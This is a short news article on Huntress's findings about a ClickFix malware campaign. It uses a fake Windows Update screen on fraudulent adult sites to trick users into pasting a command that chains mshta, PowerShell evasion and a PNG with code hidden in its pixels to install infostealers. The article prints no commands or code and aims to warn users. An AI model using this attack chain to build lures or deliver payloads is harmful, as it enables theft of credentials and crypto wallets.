Key Takeaways
1. ClickFix Malware disguises itself as a legitimate Windows Update to trick users into executing harmful commands.
2. The malware spreads mainly through fraudulent adult websites, presented as ads or age verification prompts.
3. It utilizes pixel data from a PNG file to launch infostealers that capture sensitive personal information.
4. The malware employs obfuscation techniques to evade detection by security software, complicating analysis for cybersecurity professionals.
5. Users are advised to be cautious with domain URLs and avoid clicking ads or executing commands that may expose them to malware.
Cybercriminals have revamped the notorious ClickFix Malware, disguising it as a genuine Windows Update to deceive users into entering a harmful command in the Run window. This tactic is notably clever because it utilizes pixel data from a PNG file to launch infostealers that can capture usernames, passwords, crypto wallet info, bank details, and various personal data.
Discovery by Huntress
Recently, cybersecurity experts from Huntress revealed this new version of ClickFix. The malware creates a full-screen browser window that resembles a legitimate Microsoft Windows update, complete with a progress bar indicating a “critical security update” at 95% completion.
How It Spreads
This malware is predominantly found on fraudulent adult websites that imitate well-known platforms, often masked as advertisements or age verification requests. When users interact with an ad, video, or age verification prompt, they are greeted by the deceptive Windows update interface.
Upon activation, the malware prompts users to press the Windows key + R to access the Run command, paste the malicious code that has been pre-copied, and grant administrative privileges to the attackers.
Technical Mechanism
After executing the command, it activates the mshta (Microsoft HTML Application Host) program with a URL that acts as an attack vector. The built-in tool retrieves a payload from a hex-encoded URL and runs unnecessary PowerShell code, which prevents applications like Bitdefender from detecting or responding to the malicious activity. Subsequently, it deploys instructions that decrypt a PNG file, extract shell commands, and injects them into processes that are already active on the user’s system.
Despite looking benign, the PNG image harbors malicious code hidden within its pixel data, decrypted by the .NET assembly. Following several additional commands, it launches infostealers such as Rhadamanthys or LummaC2, which gather data and keystrokes for passwords, credentials, and digital crypto wallets, subsequently transmitting this information to overseas servers.
Ongoing Threat
Huntress reported that this specific version of ClickFix has been active online since early October, with numerous websites still showcasing the fake update warning, even as it is implemented with varying degrees of sophistication on those sites.
Hackers cleverly conceal harmful code within seemingly innocent images or clutter the code with unnecessary lines, which can confuse cybersecurity professionals who are scanning for malicious activity through obfuscation. Huntress has noted peculiar elements in the code, including a quote from a past UN meeting: “With regard to stage III, we highly recommend the complete destruction of all weapons, as lasting peace cannot be ensured otherwise.”
This ClickFix Windows Update malware stands out as one of the most cunning yet malevolent forms of infostealing observed thus far. Users are strongly advised to scrutinize domain URLs and refrain from clicking on ads or executing any commands directly on their devices, especially when it could unwittingly create an opening for advanced malware like ClickFix.
Source:
Link
Leave a Reply